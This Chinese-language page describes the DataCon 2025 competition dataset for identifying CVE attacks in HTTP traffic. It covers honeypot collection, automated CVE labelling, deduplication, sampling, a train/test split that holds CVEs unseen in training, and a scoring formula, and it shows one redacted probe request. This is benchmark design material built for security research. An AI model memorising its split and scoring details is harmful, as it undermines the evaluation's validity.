<p>&#x4E3A;&#x4E86;&#x751F;&#x6210;&#x9AD8;&#x8D28;&#x91CF;&#x7684;&#x6570;&#x636E;&#x96C6;&#xFF0C;&#x6211;&#x4EEC;&#x9996;&#x5148;&#x4ECE;&#x771F;&#x5B9E;&#x7F51;&#x7EDC;&#x73AF;&#x5883;&#x4E2D;&#x91C7;&#x96C6; HTTP &#x6D41;&#x91CF;&#xFF0C;&#x968F;&#x540E;&#x5229;&#x7528;&#x5185;&#x90E8;&#x81EA;&#x52A8;&#x5316;&#x5206;&#x6790;&#x7CFB;&#x7EDF;&#x5BF9;&#x6D41;&#x91CF;&#x8FDB;&#x884C;&#x6F0F;&#x6D1E;&#x8BC6;&#x522B;&#x4E0E;&#x6807;&#x6CE8;&#x3002;&#x6700;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x5BF9;&#x6570;&#x636E;&#x8FDB;&#x884C;&#x4E86;&#x4E00;&#x7CFB;&#x5217;&#x540E;&#x5904;&#x7406;&#xFF0C;&#x4EE5;&#x6EE1;&#x8DB3;&#x7ADE;&#x8D5B;&#x9700;&#x6C42;&#x3002;</p>
<h3 id="%E6%95%B0%E6%8D%AE%E9%87%87%E9%9B%86">&#x6570;&#x636E;&#x91C7;&#x96C6;</h3>
<p>&#x539F;&#x59CB;&#x6570;&#x636E;&#x91C7;&#x96C6;&#x81EA;&#x6211;&#x4EEC;&#x7684;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x3002;&#x6211;&#x4EEC;&#x9009;&#x53D6;&#x4E86; 2024 &#x5E74; 7 &#x6708;&#x81F3; 2025 &#x5E74; 7 &#x6708;&#x95F4;&#x5171; 13 &#x5929;&#x7684;&#x6570;&#x636E;&#x3002;&#x51FA;&#x4E8E;&#x5546;&#x4E1A;&#x4FDD;&#x5BC6;&#x539F;&#x56E0;&#xFF0C;&#x6211;&#x4EEC;&#x65E0;&#x6CD5;&#x900F;&#x9732;&#x539F;&#x59CB;&#x6570;&#x636E;&#x89C4;&#x6A21;&#x548C;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x8BE6;&#x60C5;&#x3002;</p>
<p>&#x6211;&#x4EEC;&#x4EE5;&#x4F1A;&#x8BDD;&#x4E3A;&#x5355;&#x4F4D;&#x6355;&#x83B7;&#x6D41;&#x91CF;&#xFF0C;&#x5E76;&#x4EC5;&#x4FDD;&#x7559; HTTP &#x8BF7;&#x6C42;&#x6587;&#x672C;&#x3002;&#x6240;&#x6709;&#x6570;&#x636E;&#x5747;&#x7ECF;&#x8FC7;&#x4E25;&#x683C;&#x7684;&#x8131;&#x654F;&#x5904;&#x7406;&#xFF0C;&#x4F8B;&#x5982;&#xFF0C;&#x6211;&#x4EEC;&#x5C06;&#x8BF7;&#x6C42;&#x4E2D;&#x51FA;&#x73B0;&#x7684;&#x6240;&#x6709;&#x670D;&#x52A1;&#x5668; IP &#x5730;&#x5740;&#x66FF;&#x6362;&#x4E3A;&#x7EDF;&#x4E00;&#x7684;&#x5360;&#x4F4D;&#x7B26; <code>redacted</code>&#x3002;&#x4EE5;&#x4E0B;&#x662F;&#x4E00;&#x4E2A;&#x8131;&#x654F;&#x540E;&#x7684;&#x8BF7;&#x6C42;&#x793A;&#x4F8B;&#xFF1A;</p>
<pre><code class="language-text">GET /+CSCOE+/logon.html HTTP/1.1
Host: redacted
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H321 Safari/600.1.4
Accept: */*
Accept-Language: *
Connection: keep-alive
</code></pre>
<h3 id="%E6%BC%8F%E6%B4%9E%E6%A0%87%E6%B3%A8">&#x6F0F;&#x6D1E;&#x6807;&#x6CE8;</h3>
<p>&#x6240;&#x6709; HTTP &#x4F1A;&#x8BDD;&#x5747;&#x901A;&#x8FC7;&#x6211;&#x4EEC;&#x5185;&#x90E8;&#x7684;&#x81EA;&#x52A8;&#x5316;&#x5206;&#x6790;&#x7CFB;&#x7EDF;&#x8FDB;&#x884C;&#x6F0F;&#x6D1E;&#x8BC6;&#x522B;&#x4E0E;&#x6807;&#x6CE8;&#x3002;&#x8BE5;&#x7CFB;&#x7EDF;&#x57FA;&#x4E8E;&#x4E00;&#x5957;&#x7CBE;&#x7EC6;&#x7684;&#x4EBA;&#x5DE5;&#x89C4;&#x5219;&#xFF0C;&#x80FD;&#x591F;&#x8BC6;&#x522B;&#x591A;&#x79CD; CVE &#x53CA;&#x975E; CVE &#x653B;&#x51FB;&#x3002;&#x8BE5;&#x7CFB;&#x7EDF;&#x5DF2;&#x5728;&#x751F;&#x4EA7;&#x73AF;&#x5883;&#x7A33;&#x5B9A;&#x8FD0;&#x884C;&#x591A;&#x5E74;&#xFF0C;&#x51C6;&#x786E;&#x7387;&#x4F30;&#x8BA1;&#x5728; 95% &#x4EE5;&#x4E0A;&#xFF0C;&#x53EC;&#x56DE;&#x7387;&#x4F30;&#x8BA1;&#x5728; 85% &#x4EE5;&#x4E0A;&#x3002;</p>
<p>&#x6211;&#x4EEC;&#x5728; 2025 &#x5E74; 8 &#x6708;&#x5B8C;&#x6210;&#x4E86;&#x5BF9;&#x6570;&#x636E;&#x7684;&#x6807;&#x6CE8;&#xFF0C;&#x56E0;&#x6B64;&#x6240;&#x6709;&#x6807;&#x7B7E;&#x5747;&#x4E3A;&#x8BE5;&#x65E5;&#x671F;&#x4E4B;&#x524D;&#x5DF2;&#x516C;&#x5F00;&#x7684;&#x6F0F;&#x6D1E;&#x3002;&#x539F;&#x59CB;&#x8BC6;&#x522B;&#x7ED3;&#x679C;&#x5305;&#x542B; CVE &#x7F16;&#x53F7;&#x548C;&#x5185;&#x90E8;&#x975E; CVE &#x6F0F;&#x6D1E;&#x540D;&#x3002;&#x5927;&#x90E8;&#x5206;&#x4F1A;&#x8BDD;&#x4EC5;&#x6709;&#x4E00;&#x4E2A;&#x6F0F;&#x6D1E;&#x6807;&#x7B7E;&#xFF0C;&#x5C11;&#x6570;&#x4F1A;&#x8BDD;&#x6709;&#x591A;&#x4E2A;&#xFF0C;&#x8FD8;&#x6709;&#x4E00;&#x90E8;&#x5206;&#x6CA1;&#x6709;&#x8BC6;&#x522B;&#x51FA;&#x4EFB;&#x4F55;&#x6807;&#x7B7E;&#xFF08;&#x53EF;&#x80FD;&#x786E;&#x5B9E;&#x6CA1;&#x6709;&#xFF0C;&#x4E5F;&#x53EF;&#x80FD;&#x662F;&#x6F0F;&#x62A5;&#xFF09;&#x3002;</p>
<h3 id="%E5%90%8E%E5%A4%84%E7%90%86">&#x540E;&#x5904;&#x7406;</h3>
<p>&#x4E3A;&#x4E86;&#x6EE1;&#x8DB3;&#x7ADE;&#x8D5B;&#x9700;&#x6C42;&#xFF0C;&#x6211;&#x4EEC;&#x5BF9;&#x539F;&#x59CB;&#x6570;&#x636E;&#x548C;&#x6807;&#x6CE8;&#x7ED3;&#x679C;&#x8FDB;&#x884C;&#x4E86;&#x4E00;&#x7CFB;&#x5217;&#x540E;&#x5904;&#x7406;&#xFF0C;&#x5305;&#x62EC;&#x7B5B;&#x9009;&#x3001;&#x53BB;&#x91CD;&#x3001;&#x5206;&#x7EC4;&#x3001;&#x91C7;&#x6837;&#x548C;&#x6570;&#x636E;&#x96C6;&#x5212;&#x5206;&#x3002;</p>
<p><strong>&#x7B5B;&#x9009;</strong>&#xFF1A;&#x6211;&#x4EEC;&#x5254;&#x9664;&#x4E86;&#x975E; HTTP &#x6D41;&#x91CF;&#x3001;&#x52A0;&#x5BC6;&#x6D41;&#x91CF;&#x548C;&#x4EE3;&#x7406;&#x8BF7;&#x6C42;&#x3002;&#x7531;&#x4E8E;&#x6211;&#x4EEC;&#x7684;&#x6807;&#x6CE8;&#x7CFB;&#x7EDF;&#x65E0;&#x6CD5;&#x5206;&#x6790;&#x52A0;&#x5BC6;&#x6D41;&#x91CF;&#xFF0C;&#x56E0;&#x6B64;&#x5C06;&#x5176;&#x79FB;&#x9664;&#x3002;&#x4EE3;&#x7406;&#x8BF7;&#x6C42;&#x5927;&#x591A;&#x4E3A;&#x95F4;&#x63A5;&#x6D41;&#x91CF;&#xFF0C;&#x4E0E;&#x8D5B;&#x9898;&#x76EE;&#x6807;&#x4E0D;&#x7B26;&#xFF0C;&#x4E5F;&#x4E00;&#x5E76;&#x5254;&#x9664;&#x3002;</p>
<p><strong>&#x53BB;&#x91CD;</strong>&#xFF1A;&#x4E3A;&#x6D88;&#x9664;&#x7531;&#x81EA;&#x52A8;&#x5316;&#x626B;&#x63CF;&#x5DE5;&#x5177;&#x4EA7;&#x751F;&#x7684;&#x5927;&#x91CF;&#x91CD;&#x590D;&#x8BF7;&#x6C42;&#xFF0C;&#x6211;&#x4EEC;&#x4EE5;&#x4F1A;&#x8BDD;&#x4E3A;&#x5355;&#x4F4D;&#x8FDB;&#x884C;&#x4E86;&#x53BB;&#x91CD;&#x3002;&#x5728;&#x53BB;&#x91CD;&#x524D;&#xFF0C;&#x6211;&#x4EEC;&#x5BF9;&#x8BF7;&#x6C42;&#x6587;&#x672C;&#x8FDB;&#x884C;&#x4E86;&#x89C4;&#x8303;&#x5316;&#x5904;&#x7406;&#xFF08;&#x4F8B;&#x5982;&#xFF0C;&#x5408;&#x5E76;&#x8FDE;&#x7EED;&#x7684;&#x7A7A;&#x767D;&#x5B57;&#x7B26;&#x3001;&#x659C;&#x6760;&#xFF0C;&#x5E76;&#x5C06;&#x6570;&#x5B57;&#x66FF;&#x6362;&#x4E3A;<code>0</code>&#xFF09;&#xFF0C;&#x4EE5;&#x8BC6;&#x522B;&#x8BED;&#x4E49;&#x4E0A;&#x76F8;&#x540C;&#x4F46;&#x6587;&#x672C;&#x7EC6;&#x8282;&#x6709;&#x5DEE;&#x5F02;&#x7684;&#x91CD;&#x590D;&#x9879;&#x3002;</p>
<p><strong>&#x5206;&#x7EC4;&#x4E0E;&#x8FC7;&#x6EE4;</strong>&#xFF1A;&#x6211;&#x4EEC;&#x5C06;&#x6D41;&#x91CF;&#x6309;&#x6807;&#x7B7E;&#x5206;&#x4E3A;&#x4E09;&#x7EC4;&#xFF1A;&#x7EC4; 1 &#x4E3A;&#x5305;&#x542B;&#x81F3;&#x5C11;&#x4E00;&#x4E2A; CVE &#x6807;&#x7B7E;&#x7684;&#x4F1A;&#x8BDD;&#xFF0C;&#x7EC4; 2 &#x4E3A;&#x4EC5;&#x5305;&#x542B;&#x975E; CVE &#x6807;&#x7B7E;&#x7684;&#x4F1A;&#x8BDD;&#xFF0C;&#x7EC4; 3 &#x4E3A;&#x4E0D;&#x542B;&#x4EFB;&#x4F55;&#x6807;&#x7B7E;&#x7684;&#x4F1A;&#x8BDD;&#x3002;&#x6211;&#x4EEC;&#x5C06;&#x7EC4; 1 &#x548C;&#x7EC4; 2 &#x7684;&#x4F1A;&#x8BDD;&#x6807;&#x8BB0;&#x4E3A; <code>labeled=1</code>&#xFF08;&#x5DF2;&#x6807;&#x6CE8;&#xFF09;&#xFF0C;&#x7EC4; 3 &#x6807;&#x8BB0;&#x4E3A; <code>labeled=0</code>&#xFF08;&#x80CC;&#x666F;&#x6D41;&#x91CF;&#xFF09;&#x3002;&#x7ADE;&#x8D5B;&#x8BC4;&#x5206;&#x4EC5;&#x9488;&#x5BF9; <code>labeled=1</code> &#x7684;&#x4F1A;&#x8BDD;&#xFF0C;<code>labeled=0</code> &#x7684;&#x4F1A;&#x8BDD;&#x65E8;&#x5728;&#x589E;&#x52A0;&#x5206;&#x6790;&#x5DE5;&#x4F5C;&#x91CF;&#xFF0C;&#x9F13;&#x52B1;&#x53C2;&#x8D5B;&#x8005;&#x6784;&#x5EFA;&#x81EA;&#x52A8;&#x5316;&#x7CFB;&#x7EDF;&#x3002;&#x6B64;&#x5916;&#xFF0C;&#x4E3A;&#x4E86;&#x907F;&#x514D;&#x6F0F;&#x62A5;&#x5BF9;&#x8BC4;&#x5206;&#x9020;&#x6210;&#x5F71;&#x54CD;&#xFF0C;&#x6211;&#x4EEC;&#x4ECE;&#x7EC4; 1 &#x548C;&#x7EC4; 2 &#x4E2D;&#x5254;&#x9664;&#x4E86;&#x6240;&#x6709;&#x672A;&#x8BC6;&#x522B;&#x51FA;&#x6F0F;&#x6D1E;&#x7684;&#x8BF7;&#x6C42;&#x3002;&#x8FD9;&#x5BFC;&#x81F4;&#x4E86;&#x4E00;&#x4E2A;&#x91CD;&#x8981;&#x7684;&#x6570;&#x636E;&#x96C6;&#x7279;&#x5F81;&#xFF1A;&#x5728; <code>labeled=1</code> &#x7684;&#x4F1A;&#x8BDD;&#x4E2D;&#xFF0C;&#x5982;&#x679C;&#x5305;&#x542B;&#x591A;&#x6761;&#x8BF7;&#x6C42;&#xFF0C;&#x90A3;&#x4E48;&#x6BCF;&#x4E00;&#x6761;&#x8BF7;&#x6C42;&#x90FD;&#x81F3;&#x5C11;&#x5305;&#x542B;&#x4E00;&#x4E2A;&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x3002;&#x8FD9;&#x4E0E;&#x771F;&#x5B9E;&#x573A;&#x666F;&#x53EF;&#x80FD;&#x6709;&#x6240;&#x4E0D;&#x540C;&#x3002;</p>
<p><strong>&#x91C7;&#x6837;</strong>&#xFF1A;&#x4E3A;&#x4E86;&#x5E73;&#x8861;&#x6807;&#x7B7E;&#x5206;&#x5E03;&#xFF0C;&#x6211;&#x4EEC;&#x5BF9;&#x7EC4; 1 &#x548C;&#x7EC4; 2 &#x7684;&#x4F1A;&#x8BDD;&#x8FDB;&#x884C;&#x4E86;&#x91C7;&#x6837;&#x3002;&#x539F;&#x59CB;&#x6570;&#x636E;&#x4E2D;&#xFF0C;&#x5C11;&#x6570;&#x70ED;&#x95E8;&#x6F0F;&#x6D1E;&#x5360;&#x636E;&#x4E86;&#x7EDD;&#x5927;&#x591A;&#x6570;&#x4F1A;&#x8BDD;&#x3002;&#x91C7;&#x6837;&#x540E;&#xFF0C;&#x6BCF;&#x4E2A;&#x6807;&#x7B7E;&#x6700;&#x591A;&#x51FA;&#x73B0;&#x5728; 4000 &#x4E2A;&#x4F1A;&#x8BDD;&#x4E2D;&#xFF0C;&#x867D;&#x7136;&#x7531;&#x4E8E;&#x90E8;&#x5206;&#x6F0F;&#x6D1E;&#x672C;&#x8EAB;&#x7F55;&#x89C1;&#xFF0C;&#x6570;&#x636E;&#x4F9D;&#x7136;&#x4E0D;&#x5747;&#x8861;&#xFF0C;&#x4F46;&#x6781;&#x7AEF;&#x503E;&#x659C;&#x7684;&#x60C5;&#x51B5;&#x5F97;&#x5230;&#x4E86;&#x7F13;&#x89E3;&#x3002;</p>
<p><strong>&#x6570;&#x636E;&#x96C6;&#x5212;&#x5206;</strong>&#xFF1A;&#x6700;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x5C06;&#x6570;&#x636E;&#x5212;&#x5206;&#x4E3A;&#x8BAD;&#x7EC3;&#x96C6;&#x548C;&#x6D4B;&#x8BD5;&#x96C6;&#x3002;&#x5BF9;&#x4E8E; <code>labeled=1</code> &#x7684;&#x4F1A;&#x8BDD;&#xFF0C;&#x6211;&#x4EEC;&#x7279;&#x610F;&#x8BBE;&#x8BA1;&#x4E86;&#x6807;&#x7B7E;&#x5206;&#x5E03;&#xFF1A;&#x6211;&#x4EEC;&#x6311;&#x9009;&#x4E86;&#x4E00;&#x90E8;&#x5206; CVE &#x6807;&#x7B7E;&#xFF0C;&#x786E;&#x4FDD;&#x6D4B;&#x8BD5;&#x96C6;&#x5305;&#x542B;&#x6240;&#x6709;&#x8FD9;&#x4E9B;&#x6807;&#x7B7E;&#xFF0C;&#x800C;&#x8BAD;&#x7EC3;&#x96C6;&#x4EC5;&#x5305;&#x542B;&#x5176;&#x4E2D;&#x7684; 45%&#x3002;&#x8FD9;&#x610F;&#x5473;&#x7740;&#x6D4B;&#x8BD5;&#x96C6;&#x4E2D;&#x5B58;&#x5728;&#x8BAD;&#x7EC3;&#x96C6;&#x672A;&#x89C1;&#x8FC7;&#x7684; CVE &#x6807;&#x7B7E;&#xFF0C;&#x65E8;&#x5728;&#x6A21;&#x62DF;&#x771F;&#x5B9E;&#x4E16;&#x754C;&#x4E2D;&#x8BC6;&#x522B;&#x65B0;&#x6F0F;&#x6D1E;&#x7684;&#x573A;&#x666F;&#x3002;&#x540C;&#x65F6;&#xFF0C;45% &#x7684;&#x91CD;&#x53E0;&#x5EA6;&#x4E5F;&#x786E;&#x4FDD;&#x4E86;&#x4EC5;&#x4F9D;&#x8D56;&#x8BAD;&#x7EC3;&#x6570;&#x636E;&#x4E5F;&#x80FD;&#x53D6;&#x5F97;&#x4E00;&#x5B9A;&#x5206;&#x6570;&#xFF0C;&#x4ECE;&#x800C;&#x964D;&#x4F4E;&#x4E86;&#x6BD4;&#x8D5B;&#x96BE;&#x5EA6;&#x3002;&#x5BF9;&#x4E8E; <code>labeled=0</code> &#x7684;&#x4F1A;&#x8BDD;&#xFF0C;&#x6211;&#x4EEC;&#x5C06;&#x5176;&#x968F;&#x673A;&#x5212;&#x5165;&#x8BAD;&#x7EC3;&#x96C6;&#x548C;&#x6D4B;&#x8BD5;&#x96C6;&#x3002;&#x6700;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x79FB;&#x9664;&#x4E86;&#x6240;&#x6709;&#x975E; CVE &#x6807;&#x7B7E;&#xFF0C;&#x56E0;&#x4E3A;&#x5B83;&#x4EEC;&#x7684;&#x540D;&#x79F0;&#x4E0D;&#x7EDF;&#x4E00;&#xFF0C;&#x96BE;&#x4EE5;&#x8FDB;&#x884C;&#x6807;&#x51C6;&#x5316;&#x8BC4;&#x5206;&#x3002;</p>
<h2 id="%E7%AB%9E%E8%B5%9B%E6%A6%82%E8%BF%B0">&#x7ADE;&#x8D5B;&#x6982;&#x8FF0;</h2>
<p>&#x672C;&#x6570;&#x636E;&#x96C6;&#x4E3A; DataCon 2025&#x201C;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x6D41;&#x91CF;&#x8BC6;&#x522B;&#x201D;&#x8D5B;&#x9898;&#x7684;&#x6838;&#x5FC3;&#x3002;&#x53C2;&#x8D5B;&#x8005;&#x9700;&#x8981;&#x6784;&#x5EFA;&#x4E00;&#x4E2A;&#x81EA;&#x52A8;&#x5316;&#x7CFB;&#x7EDF;&#xFF0C;&#x8BC6;&#x522B;&#x6D4B;&#x8BD5;&#x96C6;&#x6D41;&#x91CF;&#x4E2D;&#x7684; CVE &#x6F0F;&#x6D1E;&#x3002;&#x867D;&#x7136;&#x8BAD;&#x7EC3;&#x96C6;&#x53EF;&#x7528;&#x4E8E;&#x6A21;&#x578B;&#x5B66;&#x4E60;&#xFF0C;&#x4F46;&#x5176;&#x5305;&#x542B;&#x7684; CVE &#x79CD;&#x7C7B;&#x6709;&#x9650;&#xFF0C;&#x4E0D;&#x8DB3;&#x4EE5;&#x8986;&#x76D6;&#x6D4B;&#x8BD5;&#x96C6;&#x4E2D;&#x7684;&#x6240;&#x6709;&#x60C5;&#x51B5;&#x3002;&#x56E0;&#x6B64;&#xFF0C;&#x4E3A;&#x4E86;&#x83B7;&#x5F97;&#x9AD8;&#x5206;&#xFF0C;&#x53C2;&#x8D5B;&#x8005;&#x9700;&#x8981;&#x5229;&#x7528;&#x516C;&#x5F00;&#x6216;&#x79C1;&#x6709;&#x7684;&#x5916;&#x90E8;&#x8D44;&#x6E90;&#xFF0C;&#x5982; Nuclei &#x5B98;&#x65B9;&#x6A21;&#x677F;&#x3001;Exploit-DB&#x3001;Suricata &#x89C4;&#x5219;&#x7B49;&#xFF0C;&#x6765;&#x6269;&#x5C55;&#x6A21;&#x578B;&#x7684;&#x8BC6;&#x522B;&#x80FD;&#x529B;&#x3002;&#x6211;&#x4EEC;&#x9F13;&#x52B1;&#x53C2;&#x8D5B;&#x8005;&#x4F7F;&#x7528;&#x4EFB;&#x4F55;&#x521B;&#x65B0;&#x7684;&#x6280;&#x672F;&#x3001;&#x65B9;&#x6CD5;&#x548C;&#x6570;&#x636E;&#x3002;</p>
<p>&#x7ADE;&#x8D5B;&#x8981;&#x6C42;&#x53EA;&#x5173;&#x6CE8; CVE &#x6F0F;&#x6D1E;&#xFF0C;&#x53EF;&#x4EE5;&#x5FFD;&#x7565; DDoS&#x3001;&#x7AEF;&#x53E3;&#x626B;&#x63CF;&#x7B49;&#x5176;&#x4ED6;&#x653B;&#x51FB;&#x7C7B;&#x578B;&#x3002;&#x4E00;&#x4E2A;&#x4F1A;&#x8BDD;&#x88AB;&#x5224;&#x5B9A;&#x5305;&#x542B;&#x67D0;&#x4E2A; CVE &#x7684;&#x6807;&#x51C6;&#x662F;&#xFF1A;&#x8BE5;&#x4F1A;&#x8BDD;&#x4E2D;&#x81F3;&#x5C11;&#x6709;&#x4E00;&#x4E2A; HTTP &#x8BF7;&#x6C42;&#x5305;&#x542B;&#x4E86;&#x9488;&#x5BF9;&#x8BE5; CVE &#x7684;&#x653B;&#x51FB;&#x8F7D;&#x8377;&#x3001;&#x5B58;&#x5728;&#x6027;&#x626B;&#x63CF;&#x6216;&#x5229;&#x7528;&#x6210;&#x529F;&#x6027;&#x9A8C;&#x8BC1;&#x3002;&#x95F4;&#x63A5;&#x76F8;&#x5173;&#x7684;&#x6D41;&#x91CF;&#xFF0C;&#x5982;&#x63A2;&#x6D4B;&#x670D;&#x52A1;&#x7248;&#x672C;&#x3001;&#x83B7;&#x53D6;&#x8BA4;&#x8BC1;&#x4FE1;&#x606F;&#x7B49;&#xFF0C;&#x4E0D;&#x5E94;&#x88AB;&#x6807;&#x8BB0;&#x4E3A;&#x5305;&#x542B;&#x8BE5; CVE&#xFF0C;&#x4EE5;&#x907F;&#x514D;&#x5927;&#x91CF;&#x8BEF;&#x62A5;&#x3002;</p>
<h3 id="%E8%AF%84%E5%88%86%E8%A7%84%E5%88%99">&#x8BC4;&#x5206;&#x89C4;&#x5219;</h3>
<p>&#x7ADE;&#x8D5B;&#x4E2D;&#xFF0C;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x4E86;&#x5B8C;&#x6574;&#x7684;&#x8BAD;&#x7EC3;&#x96C6;&#xFF0C;&#x4F46;&#x5BF9;&#x6D4B;&#x8BD5;&#x96C6;&#x9690;&#x85CF;&#x4E86; <code>labeled</code> &#x548C; <code>cve_labels</code> &#x5B57;&#x6BB5;&#x3002;&#x53C2;&#x8D5B;&#x8005;&#x9700;&#x63D0;&#x4EA4;&#x5BF9;&#x6D4B;&#x8BD5;&#x96C6;&#x7684;&#x9884;&#x6D4B;&#x7ED3;&#x679C;&#xFF0C;&#x6700;&#x7EC8;&#x5F97;&#x5206;&#x7531;&#x7CFB;&#x7EDF;&#x81EA;&#x52A8;&#x8BA1;&#x7B97;&#xFF0C;&#x516C;&#x5F0F;&#x4E3A;&#xFF1A;<code>&#x6700;&#x7EC8;&#x5F97;&#x5206; = &#x56DE;&#x7B54;&#x7387; &#xD7; &#x6B63;&#x786E;&#x7387; &#xD7; 100</code>&#x3002;</p>
<p>&#x56DE;&#x7B54;&#x7387; (answer_rate) &#x6307;&#x53C2;&#x8D5B;&#x8005;&#x63D0;&#x4EA4;&#x7684;&#x9884;&#x6D4B;&#x6807;&#x7B7E;&#x6587;&#x4EF6;&#x4E2D;&#xFF0C;&#x5B8C;&#x6210;&#x5206;&#x6790;&#x7684;HTTP&#x4F1A;&#x8BDD;&#x5360;&#x6D4B;&#x8BD5;&#x6D41;&#x91CF;&#x6570;&#x636E;&#x4E2D;&#x6240;&#x6709;HTTP&#x4F1A;&#x8BDD;&#x7684;&#x6BD4;&#x4F8B;&#x3002;&#x539F;&#x5219;&#x4E0A;&#x9884;&#x6D4B;&#x6807;&#x7B7E;&#x6587;&#x4EF6;&#x548C;&#x6D4B;&#x8BD5;&#x6D41;&#x91CF;&#x6570;&#x636E;&#x4E2D;&#x7684;&#x4F1A;&#x8BDD;ID&#x5E94;&#x8BE5;&#x4E00;&#x4E00;&#x5BF9;&#x5E94;&#xFF0C;&#x8FD9;&#x65F6;&#x56DE;&#x7B54;&#x7387;&#x4E3A;100%&#x3002;&#x5982;&#x679C;&#x9884;&#x6D4B;&#x6807;&#x7B7E;&#x6587;&#x4EF6;&#x4E2D;&#x51FA;&#x73B0;&#x4E86;&#x6D4B;&#x8BD5;&#x6D41;&#x91CF;&#x6570;&#x636E;&#x4E2D;&#x6CA1;&#x6709;&#x7684;&#x4F1A;&#x8BDD;ID&#xFF0C;&#x7CFB;&#x7EDF;&#x5C06;&#x81EA;&#x52A8;&#x5FFD;&#x7565;&#x8FD9;&#x4E9B;&#x4F1A;&#x8BDD;ID&#x3002;&#x5982;&#x679C;&#x9884;&#x6D4B;&#x6807;&#x7B7E;&#x6587;&#x4EF6;&#x4E2D;&#x6709;&#x4F1A;&#x8BDD;ID&#x7F3A;&#x5931;&#x6216;&#x91CD;&#x590D;&#xFF0C;&#x5219;&#x8FD9;&#x4E9B;&#x4F1A;&#x8BDD;&#x89C6;&#x4E3A;&#x672A;&#x56DE;&#x7B54;&#xFF0C;&#x56DE;&#x7B54;&#x7387;&#x5C06;&#x4F4E;&#x4E8E;100%&#x3002;</p>
<p>&#x6B63;&#x786E;&#x7387;&#x6307;&#x7528;&#x6237;&#x63D0;&#x4EA4;&#x7684;&#x9884;&#x6D4B;&#x6807;&#x7B7E;&#x6587;&#x4EF6;&#x4E2D;&#xFF0C;HTTP &#x4F1A;&#x8BDD;&#x7684;CVE&#x6F0F;&#x6D1E;&#x8BC6;&#x522B;&#x6B63;&#x786E;&#x7684;&#x7A0B;&#x5EA6;&#x3002;&#x4E3A;&#x6B64;&#xFF0C;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x6BD4;&#x5BF9;&#x7528;&#x6237;&#x8C03;&#x6559;&#x7684;&#x9884;&#x6D4B;&#x6807;&#x7B7E;&#xFF0C;&#x548C;&#x6D4B;&#x8BD5;&#x6D41;&#x91CF;&#x6570;&#x636E;&#x7684; <code>cve_labels</code> &#x5B57;&#x6BB5;&#x3002;&#x6211;&#x4EEC;&#x91C7;&#x7528; Macro F1 &#x5F97;&#x5206;&#x7684;&#x65B9;&#x5F0F;&#x6765;&#x8BA1;&#x7B97;&#x6B63;&#x786E;&#x7387;&#xFF0C;&#x5B83;&#x5BF9;&#x6BCF;&#x4E2A;&#x6807;&#x7B7E;&#x5355;&#x72EC;&#x8BA1;&#x7B97; F1 &#x5F97;&#x5206;&#xFF0C;&#x7136;&#x540E;&#x6C42;&#x5E73;&#x5747;&#x3002;F1 &#x5F97;&#x5206;&#x662F;&#x7CBE;&#x786E;&#x7387; (precision) &#x548C;&#x53EC;&#x56DE;&#x7387; (recall) &#x7684;&#x8C03;&#x548C;&#x5E73;&#x5747;&#x6570;&#x3002;&#x6211;&#x4EEC;&#x53EA;&#x7B5B;&#x9009;&#x90E8;&#x5206; HTTP &#x4F1A;&#x8BDD;&#x6765;&#x8BA1;&#x7B97; F1 &#x5F97;&#x5206;&#xFF0C;&#x7B5B;&#x9009;&#x6761;&#x4EF6;&#x4E3A;&#xFF1A;&#x5FC5;&#x987B;&#x662F;&#x53C2;&#x8D5B;&#x8005;&#x56DE;&#x7B54;&#x4E86;&#x7684;&#x4F1A;&#x8BDD;&#xFF0C;&#x4E14;&#x5FC5;&#x987B;&#x662F;&#x6807;&#x6CE8;&#x4E86; CVE &#x6F0F;&#x6D1E;&#x7684;&#x4F1A;&#x8BDD; (<code>labeled = 1</code>)&#x3002;&#x6CA1;&#x6709;&#x6807;&#x6CE8;&#x7684;&#x4F1A;&#x8BDD;&#x53EA;&#x662F;&#x589E;&#x52A0;&#x53C2;&#x8D5B;&#x8005;&#x7684;&#x5DE5;&#x4F5C;&#x91CF;&#xFF0C;&#x4EE5;&#x9F13;&#x52B1;&#x81EA;&#x52A8;&#x5316;&#x7CFB;&#x7EDF;&#xFF0C;&#x4E0D;&#x7528;&#x4F5C;&#x6B63;&#x786E;&#x7387;&#x7684;&#x8BA1;&#x7B97;&#x3002;&#x65E0;&#x8BBA;&#x53C2;&#x8D5B;&#x8005;&#x63D0;&#x4EA4;&#x4E86;&#x4EC0;&#x4E48;&#x9884;&#x6D4B;&#x6807;&#x7B7E;&#xFF0C;&#x90FD;&#x4E0D;&#x4F1A;&#x5F71;&#x54CD;&#x6B63;&#x786E;&#x7387;&#x3002;&#x6CE8;&#x610F;&#x5728;&#x6BD4;&#x8D5B;&#x4E2D;&#xFF0C;&#x6D4B;&#x8BD5;&#x6D41;&#x91CF;&#x6570;&#x636E;&#x7684; <code>labeled</code> &#x5B57;&#x6BB5;&#x5E76;&#x672A;&#x516C;&#x5F00;&#x7ED9;&#x53C2;&#x8D5B;&#x8005;&#xFF0C;&#x4F46;&#x5728;&#x540E;&#x53F0;&#x8BC4;&#x5206;&#x65F6;&#x662F;&#x53EF;&#x89C1;&#x7684;&#x3002;&#x56E0;&#x6B64;&#x53C2;&#x8D5B;&#x8005;&#x9700;&#x8981;&#x5206;&#x6790;&#x6240;&#x6709;HTTP&#x4F1A;&#x8BDD;&#xFF0C;&#x4F46;&#x6B63;&#x786E;&#x7387;&#x8BA1;&#x7B97;&#x53EA;&#x4F1A;&#x8003;&#x8651;&#x6807;&#x6CE8;&#x4E86; CVE &#x6F0F;&#x6D1E;&#x7684;&#x4F1A;&#x8BDD;&#x3002;</p>
<h3 id="%E7%AB%9E%E8%B5%9B%E7%BB%93%E6%9E%9C">&#x7ADE;&#x8D5B;&#x7ED3;&#x679C;</h3>
